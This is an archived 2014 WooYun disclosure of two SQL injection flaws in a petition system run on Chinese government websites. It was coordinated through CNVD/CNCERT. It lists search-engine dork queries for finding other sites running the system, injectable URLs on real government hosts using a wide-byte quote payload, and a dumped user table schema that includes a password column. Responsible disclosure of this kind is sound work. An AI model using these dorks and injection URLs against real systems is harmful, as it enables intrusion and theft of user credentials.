当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074311

漏洞标题:某政府信访系统存在两处SQL注入漏洞

相关厂商:杭州中软安人网络通信有限公司

漏洞作者: wefgod

提交时间:2014-08-29 11:16

修复时间:2014-11-27 11:18

公开时间:2014-11-27 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向第三方安全合作伙伴开放
2014-10-28: 细节向核心白帽子及相关领域专家公开
2014-11-07: 细节向普通白帽子公开
2014-11-17: 细节向实习白帽子公开
2014-11-27: 细节向公众公开

简要描述:

无技术含量各位低调不用在意

详细说明:

注:第一处重复
搜索
http://music.google.cn/search?q=inurl:policylaw/policylaw.do&newwindow=1&filter=0
http://music.google.cn/search?q=inurl:index/index.do%3Fact%3Dindex&newwindow=1&filter=0

image161.png


之前有人提交文件下载
WooYun: 某政府通用系统任意文件下载漏洞
杭州中软安人网络通信有限公司设计维护

漏洞证明:

SQL1
http://www.hzxf12345.gov.cn/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015

image162.png


image164.png


image166.png


Table: WEB_USERINFO
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ID | NUMBER |
| MAXQUANTUM | NUMBER |
| MEMO | VARCHAR2 |
| QUANTUM | NUMBER |
| ROLE | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| UNIT_ID | NUMBER |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
| USERPSW | VARCHAR2 |
| USERTYPE | CHAR |
+------------+----------+
http://qzxx.kq.gov.cn/sxwsxf/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015

image168.png


http://122.224.136.141:3465/scwsxf/appellate/appellate.do?act=read&jlbh=%CD%F8A0010201404140001'

image170.png


SQL2
http://www.hzxf12345.gov.cn/work/rmjyzj.do?act=qtlist&flag=1

image171.png


image173.png


修复方案:

过滤了

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-03 09:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调案例用户单位,同时CNVD将尝试联系软件生产厂商——杭州中软人安(无联系电话),后续直接通过公开邮件通报。

最新状态:

暂无